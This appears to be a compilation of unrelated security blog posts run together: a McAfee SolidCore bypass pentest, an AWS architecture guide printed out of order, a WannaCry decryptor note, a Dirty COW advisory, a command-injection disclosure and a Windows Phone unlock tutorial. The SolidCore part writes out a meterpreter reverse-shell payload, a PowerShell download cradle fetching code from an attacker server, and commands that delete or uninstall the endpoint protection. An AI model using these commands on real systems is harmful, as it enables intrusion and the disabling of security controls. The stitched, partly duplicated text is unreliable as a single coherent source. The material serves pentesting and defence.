Application whitelisting is a computer administration practice used to prevent unauthorized programs from executing. The purpose is primarily to protect computers and networks from malicious applications, and, to a lesser extent, to prevent unauthorized access to the resources.

In this article, we demonstrate how McAfee SolidCore – one of the leaders in this segment – can be bypassed.

Introduction to McAfee SolidCore

“McAfee Application Control blocks unauthorized executables on servers, corporate desktops, and fixed-function devices. Using a dynamic trust model and innovative security features such as local and global reputation intelligence, real-time behavioral analytics, and auto-immunization of endpoints, it immediately thwarts advanced persistent threats—without requiring labor-intensive list management or signature updates.”

In this particular case, the SolidCore security solution was implemented on kiosk infrastructure for restricting unauthorized code on the Windows 7 operating system.

As a pentester, our goal was to disable the SolidCore application in order to run the malicious code on the system. Our testing was performed in these two phases:

1. Performing full code execution to get reverse shell access and disabling SolidCore service
2. Bypassing the whitelisting controls to execute basic code on the system while SolidCore was still running

Exploiting Improper Permissions On the SolidCore Service

We logged in as an application user since this is a Kiosk-type machine and the application is running in auto login mode, i.e. it executed upon login by this application user ID.

By using the Windows shortcut key we successfully executed Internet Explorer. By pressing “Control + O” we explore the “C:\Windows\System32” drive. And tried to execute cmd.exe application.

However, cmd.exe was restricted by the SolidCore application. We identified that PowerShell was not restricted by the SolidCore Application.

We created PowerShell shellcode using “msfvenom” utility by running following command on our system:
msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerIP lport=443 -f powershell > test

Using PowerShell, we ran the following commands on client machine in order to download the shellcode on the target system:
Get-ExecutionPolicy

IEX(New-Object System.Net.Webclient).DownloadString(“http://attackerserver/test”)

Invoke-Shellcode -shellcode @($buf)

After execution of PowerShell, we received the meterpreter reverse shell on our system. Next step was to get SYSTEM access by performing a local privilege escalation attack on the target system.

Running-Metasploit-Handler-And-Received-Reverse-TCP-Connection.png

After receiving SYSTEM privilege, we migrated the meterpreter process to SolidCore service named “svsrvc” and then navigated to SolidCore directory and renamed the SolidCore startup service.

After restarting the target system, the SolidCore service got disabled!

solidcore-service-disabled

Disabling SolidCore Service using the McAfee Service Utility

To fix the first scenario, the client disabled all the shortcut keys and PowerShell on the Kiosk machine. Also they implemented write blocking on the SolidCore directory.

In our next test case, we used the administrative user to check the security of the SolidCore application. The Windows Administrator account was not allowed to modify or disable SolidCore service without providing the credentials of SolidCore service.

While performing the assessment, we observed that SolidCore uses the cmd.exe to manage their service.

Disabling SolidCore Service using the McAfee Service Utility

To fix the first scenario, the client disabled all the shortcut keys and PowerShell on the Kiosk machine. Also they implemented write blocking on the SolidCore directory.

In our next test case, we used the administrative user to check the security of the SolidCore application. The Windows Administrator account was not allowed to modify or disable SolidCore service without providing the credentials of SolidCore service.

While performing the assessment, we observed that SolidCore uses the cmd.exe to manage their service.

mcafee-utility

Using SC Query Utility

After getting command line access, our first step was to create a service called “sysaccount” which would launch the command shell in interactive mode as shown below:

SC Query To Execute System Command

And then start this service called “sysaccount”
sc start Sysaccount

This launched the interactive command line with SYSTEM privileges as shown in the screenshot below:

Executed SYSTEM Interactive CMD Shell

After receiving the interactive system shell, we executed the command to delete the SolidCore service. As we are running with SYSTEM privileges, we were able to delete the service.

SC Delete Command To Remove Solidcore Service

SolidCore Service Disabled Checked Using SADMIN

A neat way to use the security product’s own utility against itself!

Using WMIC Utility

To fix this, the client disabled the “sc” command which we used earlier. After some research, we came up with new technique to disable the SolidCore service using WMI (Windows Management Instrumentation) and the standard Windows taskkill command.

Note: Simple techniques such as using the Task Manager don’t work since that is disabled. Also killing the service by simply using the taskkill command also does not work, as the service gets restarted immediately with a new process id.

We logged in as administrator used same utility which we used earlier and executed below command which will initiate the call to SolidCore service to uninstall.

wmic product where name="McAfee Solidifier" call uninstall /nointeractive

taskkill /f /pid scsrvcpid

WMIC Utility Uninstall Solidcore

And boom – it’s gone again!

References Used for SolidCore Bypass
https://subt0x10.blogspot.ae/

Securing the Architecture
Security of cloud environment is important considering the enormous impact it has on core operations. We will address security requirements (S1 and S2) in this section.

• S1. Securing data at rest and in transit
• S2. Manage access control as the user base expands

Amazon offers several services that integrate with other services to help improve overall security posture. Following services are significant to our architecture:

VPC (VIRTUAL PRIVATE CLOUD)
Network segmentation is one of the basic controls for restricting access to authorised users. VPC is a logically isolated section of AWS cloud where customers can launch AWS resources in a virtual network. VPC is similar to traditional networks and enables the seamless creation of public/private subnets, and control access using security groups.
Furthermore, our architecture stack i.e. OpsWorks stack needs to be launched in a VPC. Once main VPC is created it is assigned an Internet Gateway. We need to logically isolate DMZ Tier, Web Tier, and Database Tier. Also, Web Tier and Database Tier will have a private VPC for each availability zone connected with VPC peering.

• DMZ Tier contains ELB, CloudFront, and a public subnet with Bastion host and NAT Gateway.
• Web Tier is a private subnet managed by OpsWorks App Layer and consists of EC2 instances.
• Database Tier is a private subnet managed by RDS OpsWorks Layer and consists of AWS Aurora RDS instances.
• VPC endpoints should be setup to access private S3 bucket and Glacier vaults from private VPC’s.

SECURITY GROUPS
Security groups are similar to router ACL’s that implement access control on resources in a particular subnet (VPC). Security groups and VPC allow customers to choose the private IP ranges and subnet masks as per requirement. We will create three groups: DBGroup for database instances, WebGroup for server instances and DMZ group for public instances. Briefly, following controls should be implemented for VPC’s using security groups:

• A Database private subnet (DBGroup) is only accessible from web server subnet (WebGroup)
• A web server subnet is only accessible from elastic load balancer (ELB).
• Web and Database subnet allows outbound connections to NAT device. This is required for software updates or other maintenance that require access to the Internet.
• A bastion host is only accessible from public IP (on-premise system) provided by customers network over RDP.

IDENTITY ACCESS MANAGEMENT (IAM)
Amazon IAM enables us to manage user access to AWS resources on a need-to-know basis. IAM supports the creation of user, role and groups permissions. Following basic IAM controls need to be in place to secure the environment:

• Never use AWS Master Account to login. It provides super-user access to all resources in AWS cloud.
• Create IAM Roles and assign roles to instances. RBAC can be implemented using IAM features.
• Enable two-factor-authentication for IAM users.
• Resource and user policies must be defined to restrict access to S3 and Glacier repositories.

AWS KEY MANAGEMENT SERVICE (KMS)
KMS is a managed service that handles encryption keys used to encrypt data mentioned in S1 requirement. KMS integrates with Amazon CloudTrail to log key usage.

ENCRYPTION

Data at Rest
AWS offers three Key Management Infrastructure (KMI) models for encrypting data at rest. These models are based on the level of control AWS and customers have on KMI components. AWS manages the entire KMI in Model C and offers server-side encryption all storage services referenced in this guide. Model C server-side encryption is recommended for current architecture to avoid key management overhead for the customer. It uses an AES-256 algorithm for server side encryption and all storage services in our architecture support this feature.

Data in transit
AWS services support IPsec and SSL/TLS for encrypting data in transit. IPsec offers applications layers to communicate securely without any modification. SSL/TLS, on the other hand, and often requires application layer support. Moreover, HTTPS traffic can be offloaded at ELB to minimise performance impact on web servers, however, security and performance requirements need to be evaluated based on data criticality.

LOGGING AND MONITORING
Logging and monitoring user activity is one of the core principles of information security. CloudTrail web service tracks API calls on AWS account and stores log files to S3 bucket. It integrates seamlessly with AWS OpsWorks and affords compliance with standards and policies.

SECURITY PATCHING
Infrastructure security of EC2 instances needs to be managed by customers including patching and hardening. Security and maintenance of services like ELB and RDS are managed by Amazon.Conclusion

Conclusion
We have identified all the concepts and components required to build an AWS architecture that meets customer requirements. Final reference architecture shown below is an accretion of these concepts and components. The architecture is self-explanatory, however, do let us know in comment section if you have any queries.

Architecture introduces best practices to build highly available, scalable, manageable and secure web application on Amazon Web Services (AWS) Cloud. It specifically addresses the requirements/concerns described in requirements section below. This guide will be valuable to an individual or team who understands basic networking concepts. This will be a two-part series; Part 1 (this post) will discuss general requirements, AWS specific concepts, define the series terminology, and build up a foundation by discussing general designing concepts , Part 2 will address the security aspect of architecture and several ways to leverage available AWS services. Moreover, it will consolidate all the information and sketch the final architecture. So, let’s get started.

Methodology

This guide is distributed in two predominant sections that answer following questions and suggest reference architecture:

• How can a highly available, scalable and manageable web application be built on AWS Cloud?
• How to secure web application environment in AWS Cloud?

It will cover high-level concepts and but technical and configuration details are out of scope. Focus will be on core production environment and restricted to components addressing the customer requirements. Proofing of reference architecture is based on the following hypothesis:

• Architecture follows similar architecture as traditional web hosting infrastructure.
• Architecture does not consider cost estimation for the project.
• Focused on DevOps automation to allow easy management and replication of multiple environments.
• Default purchasing option for all AWS services is “On-Demand”, due to the uncertainty of workload.
• AWS Aurora web service is available in region of architecture

Requirements

Customer requirements can be logically congregated into 6 major criterion. Moreover, unique ID# assigned below will be referenced throughout the document:

High-availability (HA)

• HA1. provision for Disaster Recovery
• HA2. effective distribution of load
• HA3. a self-healing infrastructure that recovers from failed service instances

High-scalability (HS)

• HS1. Infrastructure scaling to meet the demand (load-based scaling)
• HS2. On demand services due to uncertainty of workload

Low-latency (LL)

• LL1. Reduce latency of web application

Archival strategy (AS)

• AS1. An archival strategy needed for objects inactive for more than 6 months

Convenience and control (CC)

• CC1. Capability to configure database and data access layer
• CC2. Capability to effortlessly manage and replicate multiple environments based on blueprint architecture.

Security (S)

• S1. Securing data at rest and in transit
• S2. Manage access control as the user base expands

Architecture Design
This section will address high availability, high scalability, low-latency, and management requirements. Present environment is based on LAMP stack (PHP and MySQL), which must be implemented using a multi-tier architecture as per best practices. The basic three-tier architecture consists of Client Tier, Web Tier and Database Tier. However, our architecture will have DMZ Tier, Web Tier, Database Tier, and Ancillary Tier, conceptually.
AWS OpsWorks service offers control and convenience of implementing LAMP stack into a multi-tier architecture. It is a configuration management service that offers Chef Recipes (blueprints), infrastructure orchestration and also introduces “point and click” deployment alternatives. OpsWorks features can be mapped to customer requirements as follows:

• HS1 – auto instance scaling feature that automatically adds instances based on defined criteria (load or time based) and implemented using Auto-scaling groups.
• HA2 – ELB service layer effectively distributes the load by performing the health check on underlying EC2 instances.
• CC2 – OpsWorks management console introduces replication of complete stack in distinct availability zones or regions without any hassle.
• CC1 – RDS service layer that provides the necessary level of abstraction and control on underlying RDS instances.
• HA3 – auto-healing feature ensures that if any instance fails in the stack it is automatically replaced with a new instance.

Core architecture components will be implemented as follows:

• Web Server – Amazon EC2 instance implemented with PHP App Server AWS OpsWorks Layer blueprint.
• MySQL Database server – MySQL database engine on RDS instance.

AWS CONCEPTS
Following are key AWS concepts for the better understanding of architecture:
Auto scaling (High scalability)
Auto Scaling allows the instance or service to automatically scale the capacity according to defined conditions. AWS services scale dynamically and without impacting the availability of service. Auto Scaling ensures that instances scale out flawlessly to meet the demand.

Multi-AZ (High availability)
Each Amazon data centre location is called a region which contains several distinctive locations called Availability Zones, or AZs. AZs are engineered to be isolated from each other in case of failures, and afford low-latency, low-cost network connectivity to other AZs in the same region. High availability requirements of the application can be met by launching all services in multiple availability zones (Multi-AZ).

APPLICATION LAYERS
All the application layers will be implemented within Virtual Private Cloud (VPC)’s and OpsWorks Layers unless exclusively stated. AWS services referenced in this architecture support server-side encryption and SSL/TLS, hence security requirements are consolidated in “Encryption” section.

DMZ Tier
DMZ consist of Elastic Load Balancer, and public subnet containing NAT gateway and a Bastion Host. Load Balancer will be implemented using OpsWorks stack but NAT gateway and Bastion instances will be placed in a public subnet directly communicating with Internet Gateway.

Bastion Host
A bastion host is required to reduce the attack surface of AWS cloud and allow secure management of resources. It will be a hardened, public facing, internet exposed, special purpose EC2 instance launched in Multi-AZ deployment.

NAT Gateway
NAT gateway is a managed service that allows outbound connections from private subnets to the Internet but prevents the Internet from initiating connections to these subnets. NAT Gateway will be implemented in Multi-AZ deployment.

Elastic Load Balancing (ELB)
AWS Elastic Load Balancing (ELB) improves fault tolerance and availability by placing compute instances behind a Load Balancer. ELB health checks increase availability and reduce the latency of application. ELB features can be mapped to customer requirements as follows:

• HS1 – ELB automatically scales its request handling capacity in response to incoming application traffic.
• HA1 – ELB can automatically balance traffic across multiple instances and multiple Availability Zones.
• HA2 – ELB detects unhealthy EC2 instances and spreads the load across the remaining healthy instances.

Web Tier
Web Tier consists of PHP/Apache application server implemented using Amazon EC2 instances and PHP App Server AWS OpsWorks Layer. EC2 combined with OpsWorks layer can be mapped to following customer requirements:

• HA – Application layer is supported by one or more EC2 instances in Multi-AZ deployment.
• HS – Auto-scaling groups scale-out EC2 instances based on defined criteria (load based threshold).
• CC2 – PHP App Server OpsWorks Layer of automatically handles instance scaling and offers blueprints to launch PHP application server instances in OpsWorks stack.

Database Tier
The Database Tier is responsible for persistent data management and runs on MySQL standard database engine. Although Amazon RDS is an appropriate choice, it does not offer an auto-scaling feature for Compute configuration. Amazon Aurora is a database cluster service that leverages over RDS instances and offers high-availability, auto-scalability, and self-healing capability. Aurora’s features address following customer requirements:

• HA1 and HA3- Aurora storage is self-healing and fault-tolerant. It also offers automatic backups and point in time restore for disaster recovery.
• HS1 – Aurora scales the storage automatically. Although compute scaling is not automatic, cluster replicas can handle the load seamlessly during the up-gradation process.
• LL1 – Query cache is enabled by default in Aurora, reducing latency.
• CC1 and CC2 – Aurora leverages on RDS capabilities of managing administrative tasks like automatic backups, software patching and maintenance of underlying infrastructure.

Ancillary Tier
Amazon services stated below optimise latency and address archival, backup, and disaster recovery requirements.

Simple Storage Service (S3)
S3 is highly available storage service that stores data as objects. We need to implement two S3 buckets for our architecture. A public S3 bucket of static (HTML, image, video, etc.) files for CloudFront configuration and private bucket to store automatic backups and EC2 persistent data.

CloudFront
CloudFront is Amazon’s content delivery network that works with S3 buckets to rapidly deliver web content across the globe and optimise latency of an application. Its supports private content, HTTPS authentication, and parametrized requests. CloudFront is dependent on S3 Bucket for original data objects and refers to the origin server (S3 bucket) for updated information.

Glacier
Glacier is a data archival service that integrates with S3, IAM, and CloudTrail. It will be configured to automate data archiving on S3 buckets based on defined criteria. Data stored in Glacier is immutable, encrypted and mandates request signing. A low-cost archival strategy for objects older than 6 months can be achieved by combining Lifecycle management feature of S3 with Glacier.

Combinations of S3, CloudFront and Glacier address following customer requirements:

• HA – S3 automatically replicates data within the region and also offers cross-region replication.
• HS – S3 supports auto-scaling based on demand.
• LL1 – CloudFront and S3 reduce latency and improve the performance of the application.
• AS1 – Glacier provides low-cost archival service in conjunction with S3 lifecycle management feature. S3 allows the customer to define the rules of archival and specify the objects that need to be archived.

We will take a logical break here and cover security of cloud in next section, before drafting the final architecture.

A ransomware that is exploiting “ETERNALBLUE” a vulnerability found in the NSA exploits released by the ShadowBrokers.
The WannaCry ransomware attack was a worldwide cyberattack by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.

wanakiwi is based on wanadecrypt which makes possible for lucky users to :

Recover the private user key in memory to save it as 00000000.dky
Decrypt all of their files
The primes extraction method is based on Adrien Guinet’s [wannakey] (https://github.com/aguinet/wannakey) which consist of scanning the WannaCry process memory to recover the prime numbers that were not cleaned during CryptReleaseContext().

Usage

wanakiwi.exe [PID] PID is an optional parameter, by default the utility will look for any of this process:
wnry.exe
wcry.exe
data_1.exe
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Limitations

Given the fact this method relies on scanning the address space of the process that generated those keys, this means that if this process had been killed by, for instance, a reboot – the original process memory will be lost. It is very important for users to NOT reboot their system before trying this tool.
Secondly, because of the same reason, we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility ASAP.

This is not a perfect tool, but this has been so far the best solution for victims who had no backup.

Compatibility only 32 Bit

Windows XP
Windows 2003
Windows 7

Does it modify the original encrypted files?

No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files.=

This week security researcher made this issue public. A vulnerability discovered in the Linux kernel has been present for nine years.
But the vulnerability gained attention only recently when hackers started exploiting it.

How it works ?

The security hole was detected by researcher Phil Oester, who found out a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakages of private read-only memory mappings.Attackers can use this to gain write access to otherwise read-only mappings and this way take control over whole systems.

What versions of the Operating System are affected?

• Red Hat Enterprise Linux 7.x, 6.x and 5.x
• CentOS Linux 7.x, 6.x and 5.x
• Debian Linux wheezy, jessie, stretch and sid
• Ubuntu Linux precise (LTS 12.04), trusty, xenial (LTS 16.04), yakkety and vivid/ubuntu-core
• SUSE Linux Enterprise 11 and 12

Ubuntu Kernel version earlier than below patched versions, is vulnerable to Dirty Cow

• 4.8.0-26.28 for Ubuntu 16.10
• 4.4.0-45.66 for Ubuntu 16.04 LTS
• 3.13.0-100.147 for Ubuntu 14.04 LTS
• 3.2.0-113.155 for Ubuntu 12.04 LTS
• 3.16.36-1+deb8u2 for Debian 8
• 3.2.82-1 for Debian 7
• 4.7.8-1 for Debian unstable

Technical Impact

• An unprivileged local user could use this vulnerability to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
• This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Proof of Concept

For POC we have used dirtycow exploit which allows normal user to write file content which was not authorized.

Modifying Data Owned by Root using Normal Privileges

Downloading Dirty Cow Exploit and Compiling using Low Privilege User

Modifying Data Owned by Root using Normal Privileges

[table id=1 /]

How to Fix this Issue ?

RedHat

Until the security patch is published, here is the temporary mitigation for Dirty Cow vulnerability in RedHat servers:

•  Create a file “update.stp” and add these lines:

probe kernel.function("mem_write").call ? {
$count = 0
}
probe syscall.ptrace { // includes compat ptrace as well
$request = 0xfff
}
probe begin {
printk(0, "CVE-2016-5195 mitigation loaded")
}
probe end {
printk(0, "CVE-2016-5195 mitigation unloaded")
}


•  Install the “systemtap” package and its required dependencies.
• Execute the command “stap -g update.stp” as root. As system reboot can tamper with this patch, these steps would have to be repeated in case of reboots.

Ubuntu and Debian servers

Update the OS with the latest security patch available from the OS repository. This can be done using these commands:

sudo apt-get update && sudo apt-get dist-upgrade

OpenSUSE servers

Update the OS with the latest security patch available from the OS repository. This can be done using these commands:

zypper patch

CloudLinux servers

For CloudLinux 7, follow these steps:
yum clean all; yum install kernel-3.10.0-427.10.1.lve1.4.22.el7 kmod-lve-1.4-22.el7 --enablerepo=cloudlinux-updates-testing

For CloudLinux 6, follow these steps:
yum clean all; yum install kernel-2.6.32-673.26.1.lve1.4.18.el6 kmod-lve-1.4-18.el6 --enablerepo=cloudlinux-updates-testing

But before going into this let’s understand Arbitrary Code Execution –

Arbitrary Code Execution also know as command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.

Issue was reported on October 21, 2014 to AT&T Security Team.
Resolved on Jan 27, 2015 by AT&T

The issue which I found was straight forward and needs no explanation

I was able to execute the OS level command on the System below is the step wise screenshot of the Attack.

Step 1- Affected Page

Step 2 Capture Request

Step 3 Highlighted vulnerable parameter

Step 4 Modified password to execute code

step 5 code execution successful

Response from AT&T Team

Accessing Internal Storage of APPLICATION using reg eDITOR Application

Windows do not allow access to the internal storage of its application even with “mass storage” mode enabled.

Failed To Access Internal Storage of Application Windows

To get an access to internal storage we need to perform “Interop Unlock”.
For Interop Unlock there are various procedure mentioned in “xda-developers” forum.
I have used simple techniques which allow Interop unlock on windows Lumia 920 without SD Card.

Below are the steps for the same (SD Card is not required):

• Deploy the Application “vcREG_1_2_BOOTSTRAP.xap” using Application Deployment Tool found on location “C:\Program Files (x86) \Microsoft SDKs\Windows Phone\v8.1\Tools\AppDeploy”
  
• Go to “settings” menu in the windows device, scroll download and select the highlighted application as shown in below screenshot.It will launch Lumia Registry Editor and now go to “template” menu in it

• Now reconnect the device with USB J
• Now you can access the internal storage of the applications that is being mounted on your system.
  Internal Applications Storage Location: Phone\Data\PROGRAMS\{GUID}


Performing Static Analysis of XAP File

XAP is the file format used to distribute and install application software and middleware onto Microsoft’s Windows Phone 7/8/8.1/10 operating system
(Note: XAP can be installed on mobile device with the help of Application Deployment tool provided by Microsoft.)
STATIC ANALYSIS IF THE XAP FILE IS PROVIDED

1. Extracting XAP file is similar to APK extraction method.
2. Rename XAP extension with Zip and Extract the file

Static Analysis of the Store Application

Microsoft Store do not provide XAP file to download to check its content.
We need to perform below activities for extracting internal content of the application:

1. Install the application using Microsoft Store and traverse to the location
   ” Phone\Data\PROGRAMS\{GUID}”
   Note: GUID is application identifier.
2. Now we can see the application file including DLL file.

DE-COMPILE DLL File

Most of XAP files contains DLL file and other resources.
DLL file can be decompiled using the various available tool.
I have used ILSpy_Master portable tool for decompiling DLL file.

WMAppManifest Verify the Application Permission

In Windows Phone, capabilities notify the end user of the security or privacy critical functionality required by the application.
Capabilities are also used to provision the security of the least privilege chamber (LPC) and reduce the attack surface by only provisioning ACLs for what the application requires.
The capabilities are configured based on application requirement. Based on the application requirement the capabilities must be reviewed.
Applications should only be assigned capabilities which they require to perform their functionality and any unused capabilities removed.

Note: You must mark the appropriate capabilities in the manifest so that the user is correctly notified of functionality that your app uses. If you don’t mark the correct capabilities, your app may exit unexpectedly when it is being installed on a user phone.

Capabilities
https://msdn.microsoft.com/en-us/library/windows/apps/jj206936(v=vs.105).aspx

Performing Dynamic Analysis of Windows Application

PERFORMING DYNAMIC ANALYSIS ON LOCAL STORAGE
Windows by default create temp location where application stores runtime information.

Windows application stores data at the runtime in the given location:
“Windows Phone\Phone\Data\Users\DefApps\APPDATA”

In the given location we may find the critical information like database(SDF) or temporary files.

INTERCEPTING TRAFFIC USING BURPSUITE

For intercepting the HTTPS traffic of Windows Phone via Burp Suite we need import burp certificates:

1. Export Burp certificate on you operating system and then send mail to windows phone device
2. Download the certificate on mobile device as shown in below screenshot
3. It will ask to install the certificate kindly click install.
4. Once done configure the burp proxy and you are good to go
5. Now you can intercept HTTPS traffic from your windows mobile device.

Unlocking Windows Mobile Device (Lumia)

Below is the prerequisite for the same:

1. Windows Lumia Phone Device
2. Windows Phone Recovery Tool (Download URL)
3. Qualcomm Emergency Download drivers (Download URL)
4. Windows Phone Internal
5. Download FFU Image from your Lumia mobile device http://www.lumiafirmware.com/

(Note: Before you start please make sure you download all above prerequisite.)

Unlocking devices with Windows Phone Internal is only possible for devices below with mentioned Firmware Versions:
Currently these models are supported for unlocking the bootloader:

OS versions are currently supported for enabling Root Access:

HeathCliff has released a tool called “Windows Phone Internals” that allows Windows phone owners to unlock their smartphone’s bootloaders, gain root access, and even create and run custom ROMs.

Below are the steps which has to performed Unlocking Windows Device. For this tutorial, we’ll be using Window’s Lumia 920 Device.

Step 1: Installing Lumia Driver

This is mandatory steps which allows user to download windows firmware specific to your windows mobile phone devices.Install windows phone recover tool from Microsoft Site. Download Link

Lumia 920 Not Detected

Installing Qualcomm Emergency Download driver is optional but I would recommend to performing this step as my mobile phone was not detected by Window Phone Recovery Tool.

Installing Qualcomm Emergency Download drivers
Extract and place the Qualcomm folder on your desktop.
Tricky Part: Installing the certificate file to download Qualcomm Driver. Windows 10 does not allow users to install third party driver certificate in “Trusted Root Certification Authorities” category
To disable certificate driver signature verification, please follow below steps:

• Run Command prompt as Administrator and enter below command

     shutdown /r /o /t 0

• Then go to Troubleshoot Startup Setting option

Microsoft Choose Option

Microsoft Advanced Option

• You will be given a list of startup settings, which includes “Disable driver signature enforcement” as shown below screenshot.

List of startup setting

To choose the setting, you need to press F7 key.

• System will restart now you can install third party certificate in “Trusted Root Certification Authorities” category
• Disable Driver Signature Enforcement Permanently and Completely

     bcdedit /set testsigning on

• Now install third party driver certificate in “Trusted Root Certification Authorities” category
• To install certificate, click certificate file resides on <path>

Extract Qualcomm Driver To Desktop and Select Certificate File

Certificate Install Step 1

Certificate Install Step 2

Certificate Install Step 3

Certificate Install Step 4

After the completion of Certificate installation proceed with downloading Qualcomm Emergency drivers.

Follow below steps:

• Open Command prompt and go to the directory where Qualcomm Emergency driver’s folder is located

     cd C:\Users\ ..\Desktop\Qualcomm CDMA Technologies MSM\Drivers

• Then type below commands which will install the Qualcomm Emergency drivers

PnPUtil -i -a msmdm.inf
PnPUtil -i -a qcmdm.inf
PnPUtil -i -a qcser.inf

• Reboot your PC

Next, Verify if your windows phone device is detected by Windows phone recovery tool. If yes, you can proceed as below.

Step 2: Flash Windows Phone device with Original FFU

• Open “Windows Phone Internal Tool”
• Go to Flash “Flash original FFU”
• Select FFU downloaded from http://www.lumiafirmware.com/ for your device. To find out exact FFU image check the “info” section in Windows Phone Internal.
• For my device its “RM-821 VAR IMEA INDIA CV BLACK”

Orginal FFU download Lumia

Flash using Orginal FFU

• Click Continue and Phone will restart after some time

Step 3: Download firmware for your Mobile Device using Windows phone recovery Tool

• Connect your Windows phone device using USB
• Windows phone recovery will detect your phone
• Click Install Firmware Button it will download latest firmware available for your windows phone

Download Latest FFU using Windows Phone Recovery Tool

The downloaded FFU image and all the file can be found below location:
“C:\ProgramData\Microsoft\Packages\Products\RM-821”

 Step 4: Generating HEX file which allows Windows Phone to go into windows emergency Mode

• Extract gtp0.bin from FFU Image

Cd C:\Program Files (x86)\Microsoft Care Suite\Windows Device Recovery Tool

thor2 -mode ffureader -ffufile ” C:\ProgramData\Microsoft\Packages\Products\RM-821\XXX.ffu” -dump_gpt -filedir G:\MobilePentest\LUMIA920

Destination Folder: “G:\MobilePentest\LUMIA920”

Output will be “Exited with Success” Message as shown in below screenshot

Destination Folder of GPT0

• Above command will create gpt0.bin and rename it as msimage.mbn
  

  Rename GPT0 file to msimage

• Generating HEX file for Binary file using bin2hex (Download bin2hex)Download bin2Hex file and placed in “G:\MobilePentest\LUMIA920” directoryCd G:\MobilePentest\LUMIA920 bin2hex gpt1.bin

bin2hex

Step 5: Final Step Unlock Boot Loader Setting using Windows Phone Recovery Tool

(Make Sure Windows Device is Connected via USB)

• Go to Unlock Boot Loader
• Windows Phone internal will ask user to “switched to flash-mode” click “OK” and Phone will reboot in to flash mode

Unlock Boot Loader 1

Unlock Boot Loader 2

• Resource for Flashing” screen will appear once device enters into flash mode
• Select FFU image which was downloaded in “C:\ProgramData\Microsoft\Packages\Products\RM-821”
• Select Emergency folder located at “G:\MobilePentest\LUMIA920”
• Select SBL3 file for your phone device (SBL3 Download)

Unlock Boot Loader 3

Unlock Boot Loader 4

Unlock Boot Loader 5

Unlock Boot Loader 6

Unlock Boot Loader 7

• Click Continue this will unlock you Windows phone device.

Accessing Internal Storage using Windows Phone Internal

• Launch windows phone internal with connected windows phone device
• Go to Root Access à “Enable Root Access Directly on Phone”
• Click “Unlock Phone”

Enable Root Access

Enable Root Access 2

Enable Root Access 3

• This will mount the internal storage on your OS

Viola!! We have access to internal storage of device with root privileges.

Stay tuned for Windows Mobile Application security part II

Content has been reference from MongoDB Original Website.

I have create a sample command which will help you to extract the exact details required for performing security review. Along with Recommended setting suggested by MongoDB.
Please note that this Document will only highlight the point related to MongoDB not the underlying OS Security.

Intended Audience
This benchmark is intended for Security specialists, auditors who are planning to review the security of MongoDB Server. Please find below attached link for the same

Download URL
MongoDB_Security_Review_v1.0

Please let me know if there is any Feedback/Improvement in comment section below

Step 1:
Install the latest version of Microsoft Web Platform Installer (https://www.microsoft.com/web/downloads/platform.aspx/).
Step 2:
Install URL Rewrite 2.0 using Web Platform Installer on the server.

Step 3:
After installation of same, URL Rewrite starts appearing in IIS Manager.

Step 4:
Add the Outbound Rule using URL Rewrite, to replace the Response Banner to custom banner.

Step 5:
Else we can add the below shown code in web.config file also.

Thanks to my friend:
Pralhad Chaskar(c0d3xpl0it)‏
http://c0d3xpl0it.blogspot.ae/